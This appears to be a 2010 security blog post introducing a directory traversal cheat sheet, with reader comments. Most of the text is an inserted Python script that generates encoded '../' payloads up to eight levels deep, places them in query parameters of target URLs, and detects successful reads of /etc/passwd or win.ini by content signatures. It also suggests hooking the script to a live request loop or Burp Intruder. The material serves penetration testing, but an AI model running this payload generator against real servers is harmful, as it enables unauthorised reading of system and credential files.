Tuesday, April 6, 2010

Directory Traversal Cheat Sheet

You can use this cheat sheet to test web servers and application servers for directory traversal.

The list goes eight directory levels deep (up to eight "../" steps in front of the target file) and contains 880 variants of directory traversal attack signatures.

To use this list effectively, replace the "(Filename)" placeholder with the file you want to read, chosen according to the attacked web server's operating system (for example /etc/passwd on Unix-like systems or win.ini on Windows).

Be my guest to suggest more variants to this awesome list.

Enjoy ;-)

Credits to Luca "ikki" Carettoni.

Open the cheat sheet (this will take a few seconds to load this long list)
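As an added example (not the cheat sheet itself and not the author's code), the script below builds templates in the same "(Filename)" style, up to eight levels deep across a small assumed set of step encodings, fills the placeholder according to the target OS, and judges responses by a content signature rather than by the HTTP status, since a 200 can just as well be a custom error page. The step encodings, target files, signature regexes and sample responses are this example's own assumptions and do not reproduce the 880 published variants.

```python
"""Generate directory traversal variants from a "(Filename)" template and
classify responses by content signature instead of HTTP status code.

Added example, not the cheat sheet's own list: the step encodings, target
files and content signatures below are assumptions chosen to show the
mechanics, not the 880 published variants.
"""
import re

PLACEHOLDER = "(Filename)"

# One "../" step written several ways: plain, backslash, URL-encoded,
# double-encoded and overlong UTF-8 forms (assumed variant set).
STEP_VARIANTS = {
    "plain": "../",
    "backslash": "..\\",
    "encoded-slash": "..%2f",
    "encoded-dots-and-slash": "%2e%2e%2f",
    "double-encoded-slash": "..%252f",
    "encoded-backslash": "..%5c",
    "overlong-utf8-slash": "..%c0%af",
}

# The placeholder is replaced with a file that exists on the target OS.
TARGETS = {
    "unix": "etc/passwd",
    "windows": "windows/win.ini",
}

# What a real read of each target looks like. Matching on content avoids the
# trap of trusting a 200 status, which many servers return for error pages.
SIGNATURES = {
    "etc/passwd": re.compile(r"^root:[^:\n]*:0:0:", re.MULTILINE),
    "windows/win.ini": re.compile(r"^\[(fonts|extensions)\]",
                                  re.IGNORECASE | re.MULTILINE),
}


def traversal_templates(max_depth=8):
    """Yield cheat-sheet style templates: N traversal steps, then (Filename)."""
    for step in STEP_VARIANTS.values():
        for depth in range(1, max_depth + 1):
            yield step * depth + PLACEHOLDER


def traversal_payloads(os_name="unix", max_depth=8):
    """Yield (template, payload) pairs with the placeholder filled for os_name."""
    target = TARGETS[os_name]
    for template in traversal_templates(max_depth):
        yield template, template.replace(PLACEHOLDER, target)


def build_urls(base_url, param, os_name="unix", max_depth=8):
    """Put each payload into a query parameter. The payload is inserted raw on
    purpose: its encoding *is* the test case, so it must not be re-encoded."""
    return [f"{base_url}?{param}={payload}"
            for _, payload in traversal_payloads(os_name, max_depth)]


def classify(body, status, target):
    """'hit' if the body carries the target's signature, 'soft-error' for a
    200 without it (custom error page), 'miss' otherwise."""
    if SIGNATURES[target].search(body):
        return "hit"
    if status == 200:
        return "soft-error"
    return "miss"


# Constructed sample responses (not captured from a real host) showing why
# status alone misleads: the second one is a 200 that is not a hit.
SAMPLE_RESPONSES = [
    (200, "root:x:0:0:root:/root:/bin/bash\n"
          "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"),
    (200, "<html><body><h1>Page not found</h1></body></html>"),
    (404, ""),
    (200, "; for 16-bit app support\n[fonts]\n[extensions]\n"),
]


def triage(responses=SAMPLE_RESPONSES, target="etc/passwd"):
    """Classify each response against one target; returns the verdict list."""
    return [classify(body, status, target) for status, body in responses]


if __name__ == "__main__":
    for url in build_urls("http://target.example/view", "file")[:3]:
        print(url)
    print(f"{sum(1 for _ in traversal_templates())} templates for 8 levels")
    print(triage())
```

With seven step encodings and eight depths the generator yields 56 templates; the published list is much larger because it also combines separators and encodings within a single step. The content check is the part worth keeping when you wire this up to a real request loop or to Burp Intruder's grep-match: a 200 with no signature is a soft error, not a finding.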

6 comments:

  1. Blog compatibility view problem: Each line (fuzz) starts after "(FileName)" and ends with the phrase "(FileName)".

  2. Any tools to use this payload?
    I am too lazy to write a script to read every line of this payload, send a request and judge whether the response status was 200.

    Thanks:)

  3. Do you have this list in a text file?

  4. @web security:
    You can use Burp Intruder to send this payload.
    A 200 code isn't good enough; you can get an error page with a 200 OK header.

    @Trancer:
    I intentionally posted this list in this way, in order to make it more difficult for people to copy the list with a few clicks.

  5. hehehe.. why would you do that??

  6. @Narkolayev Shlomi

    Since the Burp Suite free edition only provides a time-throttled demo version of Burp Intruder, I may consider writing a script myself :)
